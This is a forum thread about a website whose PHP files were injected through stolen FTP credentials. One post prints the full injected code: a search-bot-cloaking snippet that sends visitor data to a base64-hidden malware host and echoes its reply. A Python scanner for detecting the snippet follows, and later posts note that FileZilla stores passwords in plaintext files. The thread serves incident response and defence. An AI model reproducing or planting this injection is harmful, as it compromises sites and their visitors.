13 posts Page 2 of 2
@ntoupin

Thank you for granting me access to your server's CPanel.
The reason why I requested this access was that, since the incident you reported was a very recent one, if your server was indeed compromised, the web server's access logs would contain clues about the intrusion.

As it happens, your FTP log clearly shows such activity on the 17th of March.
IP address 72.44.80.94 logged in through your FTP credentials and made changes to several files on your server (I am PMing you a list of all such files as some of them are still present on the server).

The modified files have this piece of code injected -
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)
    &&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)
    &&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)
    &&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)
    &&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){
            // Create  bot analitics
            $stCurlLink = base64_decode('aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw')
                .'?ip='.urlencode($_SERVER['REMOTE_ADDR'])
                .'&useragent='.urlencode($sUserAgent)
                .'&domainname='.urlencode($_SERVER['HTTP_HOST'])
                .'&fullpath='.urlencode($_SERVER['REQUEST_URI'])
                .'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
        }
    }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]=="O")
        {
            $sResult[0]=" ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}

The base64-encoded string aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw leads up to http://adveconfirm.com/, a classified high-risk site that serves up malware (google for aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw and you'll find a slew of sites being affected by this trojan - most of them in the current month).

That clears up the mystery then.
Your local machine is infected and the trojan is using your FTP name/password to make modifications to PHP files on your server.
Please sanitize your machine, reset all your FTP accounts and change your FTP client.

Hope this helps. Thanks.
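As an added example, not part of the post above: a small Python scanner that walks a web root and flags PHP files carrying this injection. It looks for the markers quoted in the snippet ($sRetry, curl_init, HTTP_USER_AGENT) and also decodes every base64_decode() string literal, so a variant that swaps in a different encoded callback address is still caught and its URL exposed. The two sample file contents are constructed for the demo; the encoded string in the infected sample is the one from the post.

```python
import base64
import re
from pathlib import Path

# Markers taken from the injected snippet quoted in the post above.
MARKERS = ("$sRetry", "curl_init(", "HTTP_USER_AGENT")
# A base64_decode() call whose argument is a quoted literal (whitespace tolerated).
B64_ARG = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def decoded_urls(source):
    """Return every base64_decode() literal in `source` that decodes to an http(s) URL."""
    urls = []
    for blob in B64_ARG.findall(source):
        try:
            text = base64.b64decode(blob, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: ignore
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls


def find_injection(source):
    """Return a finding dict if `source` looks like the cloaking injection, else None."""
    hits = [m for m in MARKERS if m in source]
    urls = decoded_urls(source)
    if len(hits) == len(MARKERS) or urls:
        return {"markers": hits, "callback_urls": urls}
    return None


def scan_tree(root):
    """Walk a web root and map each suspicious .php path to its finding."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        try:
            source = path.read_text(errors="replace")
        except OSError:
            continue
        finding = find_injection(source)
        if finding:
            findings[str(path)] = finding
    return findings


# Constructed samples: the injection (abridged) prepended to a harmless file, and a clean file.
INFECTED_SAMPLE = ("<?php\nif (!isset($sRetry))\n{\nglobal $sRetry;\n$sRetry = 1;\n"
    "$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);\n"
    "$stCurlLink = base64_decode('aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw');\n"
    "$stCurlHandle = curl_init( $stCurlLink );\n}\n?>\n<?php echo 'hello'; ?>\n")
CLEAN_SAMPLE = "<?php echo base64_decode('aGVsbG8='); ?>\n"
```

Run scan_tree() against the document root of the site; each path it returns should be compared against the list of files the FTP log shows being modified.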
I've been following this post with interest - glad :) it's resolved OK - good detective work kk.

I was a bit surprised :o to read that FileZilla is not recommended because it stores passwords in plain text ... I'm using a version which doesn't do that, v2.2. Obviously not good :oops: as it's way out of date. Can anybody recommend a secure and free ftp client?
You could try http://winscp.net/eng/index.php if you are looking for secure password management in addition to an ftp client. I still prefer FileZilla's user interface, and for me it works fine as I don't use it to save passwords. Potato, if you decide to switch over, make sure you delete any remnant FileZilla files.
The following files are what you need to know about:
filezilla.xml – Stores most recent server info including password in plaintext.
recentservers.xml – Stores all recent server info including password in plaintext.
sitemanager.xml – Stores all saved sites server info including password in plaintext.
These files can usually be found in the following directories:
Windows XP/2K: “C:\Documents and Settings\username\Application Data\FileZilla”
Windows Vista: “C:\Users\username\AppData\Roaming\FileZilla\”

http://unsharptech.com/2008/05/20/filez ... plaintext/